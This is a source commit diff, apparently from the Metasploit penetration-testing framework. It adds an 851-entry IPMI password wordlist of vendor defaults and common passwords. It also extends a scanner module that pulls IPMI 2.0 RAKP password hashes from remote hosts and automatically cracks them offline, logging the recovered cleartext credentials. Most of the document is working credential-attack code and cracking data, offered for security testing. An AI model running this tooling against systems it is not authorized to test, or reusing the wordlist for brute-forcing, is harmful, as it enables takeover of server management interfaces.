Cleanup, reporting, and automatic cracking

2024-11-12 11:52:01 +01:00 · 2013-06-23 01:35:31 -05:00 · 2013-06-23 01:35:31 -05:00 · c869112407
commit c869112407
parent 5656e0cb7a
3 changed files with 932 additions and 27 deletions
--- a/data/wordlists/ipmi_passwords.txt
+++ b/data/wordlists/ipmi_passwords.txt
@ -0,0 +1,851 @@
 ADMIN
 PASSW0RD
 calvin
 admin
 root
 computer1
 changeme
 superuser
 4rfv$RFV
 password
 123456
 asdlkj
 Letmein2
 111111
 Flamenco
 1q2w3e4r
 birdshit
 237723
 gandalf6
 maria1988
 angel2000
 4rfvbhu8
 bmw12345
 letmein2
 P@ssw0rd
 12qw!@QW
 12345678
 monkeybutt
 zero2hero
 security
 letmein1
 Password1
 calvin22
 admin123
 123456789
 12345
 p@ssw0rd
 amilopro
 adminadmin
 albatros
 freedumb1
 face2face
 aztech
 antibiotico
 1qaz2wsx
 nopermission
 imperial
 Winston1
 123qwe
 odiotodo
 get2it
 evilpenguin
 changemes
 asdf1234
 Administrator
 siemens123
 hpinvent
 butt
 brian0711
 a12345678
 1234
 123
 fresher
 012012
 administrator
 Welcome123
 Tokyo1
 123qweASD
 funshion
 doris321
 zaq1xsw2
 test
 letmein
 kalimera
 goethe
 debugs
 compaq
 cisco
 carpediem
 blabla12
 bios
 apa123
 abcd1234
 Parasol1
 23skidoo
 !QAZ2wsx
 ncc1701d
 john2008
 ipax
 angusyoung
 Nemesis1
 Aloysius
 zodiac666
 soccer1
 pandemonium
 orpheus
 netnet
 lifeline
 blabla
 abc123
 Welcome0
 test123
 sun12345
 secure123
 redhat
 poepchinees
 mackousko
 level10
 kuku
 ilovetessa
 f4g5h6j7
 dropship
 bobthebuilder
 barbusse
 aristoteles
 apollo11
 a13a13
 RUPRECHT
 P4ssw0rd
 14111982
 1234ABCD
 progr3ss
 cheng1234
 winston
 wibbles
 toor
 rootroot
 root123
 qwerty
 qweQWE123
 qazwsx123
 q1w2e3r4
 q1q1q1
 prepaid
 pokemon!
 poi098
 pepsi2008
 parmesan
 leoleo
 junker
 johnny50
 hongkong
 freedom
 flapjack
 cherokee
 callofduty
 bohemia
 benitocameloo
 babyface
 augmentin
 asdfhjkl
 admin1234
 abcdef3
 Welcome1
 P@$$w0rd
 Hamster
 Avalanche
 1997
 125401
 123zxc123
 123qweasdzxc
 123qwe!@#
 112233
 04051995
 q3kze7q
 password201
 m45t3rm1nd
 jander1
 blackonblack
 1qaz@WSX
 x
 winston1
 welcome1
 vitesse
 siempre!
 shuriken
 savanna
 richard#1
 parolamea
 oceans11
 nas123
 megatron
 liquidtension
 linkin123
 letmesee
 l0v3m3
 kane
 k4hvdq9tj9
 jack1998
 itsasecret
 inverter
 happyhippo
 hannover96
 foo123
 enter123321
 enter123
 dikdik
 cisco123
 changeme123
 bigred23
 asdewq
 ardrossan
 an0th3r
 ZAQ!2wsx
 Reptile1
 Qwerty123
 Password@1
 Password123
 Password#1
 Pass1234
 P@ssword
 Haemorrhage
 8253
 2bornot2b
 2718281828
 22
 1q2w3e4r5t
 159357**
 131313
 123123
 121212
 11111111
 111
 10111011
 topsecret
 test1234
 snickers
 skywalker
 secret
 salamander
 rutabaga
 rotrot
 rosedale
 rollerblade
 ringer
 revision
 razor
 qwerty7
 qwerty12
 qwert
 qazxswedc123
 qazwsx
 proba123
 powerpower
 powder1
 poloppolop
 plopplop
 penelope
 pathology
 passw0rd
 offshore
 not4u2c
 nopass
 nitram
 nerdnerd
 mirrormirror
 mi
 mercedes
 maxima
 master
 magex
 loran123
 lol
 kingswood
 keystone
 kalvin
 juliette
 icecream
 hobbs
 hello123
 he
 grouper
 gravity
 gravis
 gizmo
 fubar
 foobar
 flying
 flyboy
 fernandes
 fastweb
 exploit
 dweeble
 dimdim
 delta
 cy
 changeme1
 catfish
 carol
 cardinal
 calvin1
 calliope
 brother
 blizzard
 blahblah
 bier
 asd
 aq12wsxz
 apricot
 apple
 airlines
 admini
 access
 abusive
 abra
 Windows1
 Un1verse
 ROOT
 Qwerty1!
 Password
 PASSWORD
 P@ssw0rd!
 OEM
 Letmein1
 KNIGHT
 Israel123
 Christmas
 Chester1
 COMPAQ
 CALVIN
 963258
 584620
 225225
 201036
 2010
 198624
 146890
 130590
 123258
 082208
 012465
 zzzz
 ytrewq
 xxxxxxxx
 xxxxxx
 xpsm1210
 xerox
 wombat
 windows7
 weblink
 ventilator
 valentino
 totototo
 toptop
 tmp123
 testtest
 tester
 test1
 taki
 system1
 sysadmin
 stanley
 spike04
 sofuck
 sofresh
 simonb
 shin
 setmefree
 semmi
 seekanddestroy
 secure6
 saynomore
 sasman
 samsun
 salope
 root4
 ronson
 roman123
 riobravo
 rikitiki
 rayong1234
 randy007
 qwertz123
 qwerty77
 qwerty123
 qwerty09
 qwert12345
 qweqweqwe
 qweasd123
 qwe123!@#
 qwe123
 qwas12
 quepasa
 qscwdv
 qq123456
 qazxsw2
 qazwsx123456
 qaz123
 q1q2q3q4
 q1q1q1q1
 powermax
 plokijuh
 pizza42
 pieceofshit
 phoenix602
 peter123
 password55
 password209
 passw0rd1
 passion12
 pass123
 pantera69
 pa$$word
 pa$$w0rd
 p3t3rpan
 opengate
 ontology
 omgomg123
 number66
 nova21
 nike2008
 n0d0ubt1
 mvemjsunp
 mustang70
 munchkin10
 mujama
 muffinman
 mikeiscool
 megabit
 mar1jane
 mama1234
 madman18
 luke1993
 ludacris
 lord1234
 lopata
 lolipop2
 lofasz
 localadmin
 letmeout
 lenor
 lemon123
 langke
 lalala
 l8rsk8r
 kusakusa
 krakonos
 km123456
 kingofthehill
 keepout123
 karmal
 karkulka
 kakala
 k123
 ji394su3
 jackson88
 integra99
 integra18
 indonesiaraya
 iamthebest
 hyperdrive
 huawei
 howard03
 hero777
 helson
 hashimoto
 hasan12345
 hanseatic
 hallo123
 hallo12
 grapenuts
 gorefest
 goldstar
 godblessyou
 gfhjkm
 getoutofhere
 genius123
 freetown1
 freedom35
 fotos1
 florida69
 fischer123
 fire1818
 figarofigaro
 ficken2000
 faszom
 f18hornet
 f00b4r
 extazy
 eragon1
 easyway
 easy123
 duffy123
 dropzone
 dennis96
 deneme
 d3ft0n3s
 d1ngd0ng
 d0dger
 d00rmat
 csigabiga
 crew10
 credu
 crashbandicoot
 consults
 collins123
 ciscocisco
 ciang
 chile62
 check123
 ch4ng3m3
 catinthehat
 carla123
 calvin99
 calvin!
 calv1n
 calamar
 bubububu
 bluespot
 blubje
 black321
 bla123
 bigbuddy
 banane1
 asdasd
 asdQWE123
 asd123qwe
 anakonda
 alpargata
 alarcon
 adoado
 abrakadabra
 abcd-1234
 abc123!!
 abc#123
 a1b2c3d4e5f6
 a1b2c3d4e5
 a123456
 a11b12c13
 Zaq1xsw2
 Und3rGr0und
 TrustNo1
 Test1234
 Super123
 Summer12
 Silicon1
 Runaway1
 Republic1
 Qwer!234
 P@ssword123
 P@55w0rd
 P@$$word
 P@$$w0rD
 Operator
 Newpass1
 MKO)9ijn
 Lasvegas1
 Insecure
 Impatiens
 INTERNAT
 Boromir1
 Berman
 Asdfg123
 Asd123
@WSX1qaz
 88888888
 874365
 832531
 735841
 666001
 570912
 56565656
 545981
 43046721
 3stones
 38483848
 311147
 2brnot2b
 29082908
 2468369
 23041979
 22242224
 222101
 22071979
 21101981
 20742074
 2071184
 20572057
 20552055
 20132013
 20112011
 1q2w3e
 1a2s3d4f
 19511951
 19501950
 19491949
 187cop
 17841784
 17201720
 17161716
 159753456
 147896325
 146688
 1456
 12qwaszx
 12qw34er
 123qwerty
 123mudar
 1234qwer!
 1234Qwer
 1234567890qwertyuiop
 123454321
 123412345
 123.com
 12201220
 12121212
 11112222
 1020304050
 10144
 10143
 10135
 10118
 10101010
 0okmnji9
 06061977
 !Q2w#E4r
 zse4rfv
 zmalqp10
 zazazaza
 zaxscdvf
 zaqwsxcde
 zaq1@WSX
 yyl
 yuiop
 yellow22
 yellow123
 yakiniku
 yabadabadoo
 xitgmLwmp
 xdr56tfc
 whitebird
 west123
 wave123
 wachtwoord
 w8w00rd
 w00tw00t
 vlis
 vivivi
 vitaly
 virginia11
 vince123
 viewmaster
 vatten
 vatefairefoutre
 united99
 united123
 triangulation
 tj1234
 titkos
 tiger123
 throwaway
 three4me
 testbed
 temppass
 temp1234
 temp11
 telefone
 tarantula1
 tagada
 sysu
 system32
 strasburg
 start123
 skysky21
 shakyamuni
 sclg
 sanayounes
 samsung34
 sallasana
 s3cur3d
 round123
 root1234
 reformation
 redpoint
 redorblue
 raritan
 rais
 qwerty1234567890
 qwerqaz
 qweewq123
 qweasdzxc2
 qweasd789
 qwe123.
 qazzxc
 qazwsx!@#
 qazw1234
 qaz74123
 pswrdpswrd
 primat
 portakal1
 picus
 phishfood
 petert999
 patrickb123
 password1`
 omfglol1
 nottelling
 nobchan
 new_password
 netadmin
 net101
 nemtom1
 n0ttelling
 mwmwmw
 mumuland
 mexx6399
 mcknight88
 masterok
 mainstreet
 maine207
 m1r4nd4
 m0t0rhead
 lkilogmL
 linux99
 lbyjpfdh
 labas123
 kukareku
 krumholz
 kolobezka
 kenzan
 kcm
 kali2002
 kalap
 k1rs1kka
 juke2008
 jtjd
 jiemou3i
 jbvm
 hogehoge
 haslo123
 harley1985
 gowest!
 gomachan
 gigi99
 ghbdtnbr
 gfhjkmrf
 gbpltw
 g8keeper
 fuckbitchesgetmoney
 formeforme
 flat24
 flaquito6
 f00sball
 f00bar
 ezit
 dream182
 delled0
 darwin99
 daemon09
 d0m1n0
 cukorborso
 cti4ever
 cpe1704tks
 compaq2003
 cisko
 changeme20
 cdwv
 cdn123
 cbtp
 cairell
 cabajka
 c@lvin
 burek123
 bublik
 bomba
 barbetta
 baofeng
 b4lls4ck
 athlon64
 aspirine
 asdlkj123
 asdlkj12
 aqua2000
 aqq123
 apstndp
 anyadhogyvan
 anakonda1
 akula123
 adminpass
 admin01
 admin001
 accobra
 abhaile1
 abcdpass
 abc123d4
 abang78
 a1rplan3
 Zxasqw12
 What3v3r
 Varadero
 TheLast1
 Tamara01
 T4urus
 SunnyJim7
 Suckit1
 Runner11
 R3volution
 Qwe12345
 QAWSEDRF
 Q!W@E#R$
 Polar123
 Passw0rd1111
 PassW0rd
 Pa22w0rd
 P@$$W0RD
 M1cha3l
 M
 LonDon
 Kia123
 Joel1234
 IPMI
 George123
 Crocodile1
 Chocolate19
 Aurora01
 Admin@123
 Admin123
 9ijn7ygv
 9641
 788111
 749174
 6922374
 643558
 4rfv%TGB
 493749
 3l3ctr1c
 343guiltyspark
 2keeper
 24041975
 23712371
 23051979
 21121477
 20682068
 20562056
 1qazxsw2
 1qazxcvb
 1qaz2wsx3edc
 1qaz0okm
 1qaz!QAZ
 1q2w3e4r5t6y
 1q2w3e4r..
 1keeper
 1340hd
 123cztery
 1234qwer`
 12345678abc
 123132123
 116572
 00850085
 *password
 !Q2w3e4r
--- a/lib/rex/proto/ipmi/utils.rb
+++ b/lib/rex/proto/ipmi/utils.rb
@ -81,6 +81,10 @@ class Utils
 		username
 	end
 	def self.verify_rakp_hmac_sha1(salt, hash, password)
 		OpenSSL::HMAC.digest('sha1', password, salt) == hash
 	end
 end
 end
 end
--- a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
+++ b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
@ -17,7 +17,12 @@ class Metasploit3 < Msf::Auxiliary
 	def initialize
 		super(
 			'Name'        => 'IPMI 2.0 RAKP Remote Password Hash Retreival',
-			'Description' => 'Identify valid usernames and their hashed passwords through the IPMI 2.0 RAKP protocol',
+			'Description' => %q|
 				This module identifies IPMI 2.0 compatible systems and attempts to retrieve the 
 				HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a 
 				file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb
 				in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.
 				|,
 			'Author'      => [ 'Dan Farmer <zen[at]fish2.com>', 'hdm' ],
 			'License'     => MSF_LICENSE,
 			'References'  => 
@ -33,7 +38,11 @@ class Metasploit3 < Msf::Auxiliary
 			OptPath.new('USER_FILE', [ true, "File containing usernames, one per line",
 				File.join(Msf::Config.install_root, 'data', 'wordlists', 'ipmi_users.txt')
 			]),
-			OptString.new('OUTPUT_FILE', [false, "File to save captured password hashes into"])
+			OptPath.new('PASS_FILE', [ true, "File containing common passwords for offline cracking, one per line",
 				File.join(Msf::Config.install_root, 'data', 'wordlists', 'ipmi_passwords.txt')
 			]),			
 			OptString.new('OUTPUT_FILE', [false, "File to save captured password hashes into"]),
 			OptBool.new('CRACK_COMMON', [true, "Automatically crack common passwords as they are obtained", true])
 		], self.class)
 	end
@ -109,12 +118,13 @@ class Metasploit3 < Msf::Auxiliary
 			end
 			if rakp.error_code != 0
-				vprint_status("#{rhost} Returned error code #{rakp.error_code} for username #{username}: #{Rex::Proto::IPMI::RMCP_ERRORS[rakp.error_code].to_s}")
+				vprint_error("#{rhost} Returned error code #{rakp.error_code} for username #{username}: #{Rex::Proto::IPMI::RMCP_ERRORS[rakp.error_code].to_s}")
 				next
 			end
 			# TODO: Finish documenting this error field
 			if rakp.ignored1 != 0
-				vprint_status("#{rhost} Returned weird error code #{rakp.ignored1} for username #{username}")
+				vprint_error("#{rhost} Returned error code #{rakp.ignored1} for username #{username}")
 				next
 			end
@ -129,37 +139,78 @@ class Metasploit3 < Msf::Auxiliary
 				username
 			)
-			found = "#{rhost} #{username}:#{hmac_buffer.unpack("H*")[0]}:#{rakp.hmac_sha1.unpack("H*")[0]}"
+			found = "#{rhost} Hash #{username}:#{hmac_buffer.unpack("H*")[0]}:#{rakp.hmac_sha1.unpack("H*")[0]}"
 			print_good(found)
 			# Write the rakp hash to the output file 
 			if @output
 				@output.write(found + "\n")
 			end
 			# Write the rakp hash to the database
 			report_auth_info(
 				:host	=> rhost,
 				:port   => rport,
 				:proto  => 'udp',
 				:sname	=> 'ipmi',
 				:user 	=> username,
 				:pass   => "#{hmac_buffer.unpack("H*")[0]}:#{rakp.hmac_sha1.unpack("H*")[0]}",
 				:source_type => "captured",
 				:active => true,
 				:type   => 'rakp_hmac_sha1_hash'
 			)
 			# Offline crack common passwords and report clear-text credentials
 			next unless datastore['CRACK_COMMON']
 			::File.open(datastore['PASS_FILE'], "rb") do |pfd|
 				passwords = pfd.read(pfd.stat.size).split("\n")
 				passwords << ""
 				passwords.uniq.each do |pass|
 					pass = pass.strip
 					next unless pass.length > 0
 					next unless Rex::Proto::IPMI::Utils.verify_rakp_hmac_sha1(hmac_buffer, rakp.hmac_sha1, pass)
 					print_good("#{rhost} Hash for user '#{username}' matches password '#{pass}'")
 					# Report the clear-text credential to the database
 					report_auth_info(
 						:host	=> rhost,
 						:port   => rport,
 						:proto  => 'udp',
 						:sname	=> 'ipmi',
 						:user 	=> username,
 						:pass   => pass,
 						:source_type => "cracked",
 						:active => true,
 						:type   => 'password'
 					)
 					break
 				end
 			end
 		end
 	end
 	def process_getchannel_reply(data, shost, sport)
 		shost = shost.sub(/^::ffff:/, '')
 		info = Rex::Proto::IPMI::Channel_Auth_Reply.new(data) rescue nil
 		# Ignore invalid responses
 		return if not info
 		return if not info.ipmi_command == 56
 		banner = info.to_banner
-		print_status("#{shost}:#{datastore['RPORT']} #{banner}")
+		print_status("#{shost} #{banner}")
 		report_service(
-			:host  => shost,
+			:host  => rhost,
-			:port  => datastore['RPORT'],
+			:port  => rport,
 			:proto => 'udp',
 			:name  => 'ipmi',
 			:info  => banner
 		)
 		# TODO:
 		# Report a vulnerablity if info.ipmi_user_anonymous has been set
 		# Report a vulnerability if ipmi 2.0 and kg is set to default
 		# Report a vulnerability if info.ipmi_user_null has been set (null username)
@ -183,9 +234,22 @@ class Metasploit3 < Msf::Auxiliary
 		info
 	end
 	def setup
 		super
 		@output = nil
 		if datastore['OUTPUT_FILE']
 			@output = ::File.open(datastore['OUTPUT_FILE'], "ab")
 		end
 	end
 	def cleanup
 		super
 		@output.close if @output
 		@output = nil
 	end
 	#
-	# Helper methods (this didn't quite fit with existing mixins)
+	# Helper methods (these didn't quite fit with existing mixins)
 	#
 	attr_accessor :udp_sock
@ -204,20 +268,6 @@ class Metasploit3 < Msf::Auxiliary
 		r[1] ? r : nil
 	end
 	def setup
 		super
 		@output = nil
 		if datastore['OUTPUT_FILE']
 			@output = ::File.open(datastore['OUTPUT_FILE'], "ab")
 		end
 	end
 	def cleanup
 		super
 		@output.close if @output
 		@output = nil
 	end
 	def rhost
 		datastore['RHOST']
 	end